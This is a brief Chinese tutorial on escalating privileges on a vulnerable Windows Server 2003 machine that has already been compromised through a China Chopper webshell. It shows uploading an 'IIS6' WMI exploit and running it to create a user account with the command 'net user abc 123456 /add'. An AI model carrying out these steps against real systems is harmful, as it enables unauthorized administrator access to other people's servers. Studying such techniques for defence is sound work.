IIS6也是一个比较古老的提权EXP了,是通过利用WMI的权限来执行命令。
目标机:漏洞巨多的Win2003
下面说一下通过IIS6在已用菜刀连接上的服务器上运用IIS6获得管理员权限的过程。
1.将cmd和IIS6上传到已用菜刀控制的服务器上。
2.用cmd打开虚拟终端。
3.建立用户并添加到管理员用户组
使用上传的cmd我们就直接拥有普通权限(可以用net user、whoami等命令)
尝试输入:whoami
发现
这说明我们有权限了。
但是用net user abc 123456 /add却被拒绝访问
于是使用IIS6提权,用法:IIS6路径 "命令"
添加用户:E:\05\admin\Databackup\iis6.exe "net user abc 123456 /add"
检查一下是否成功:net user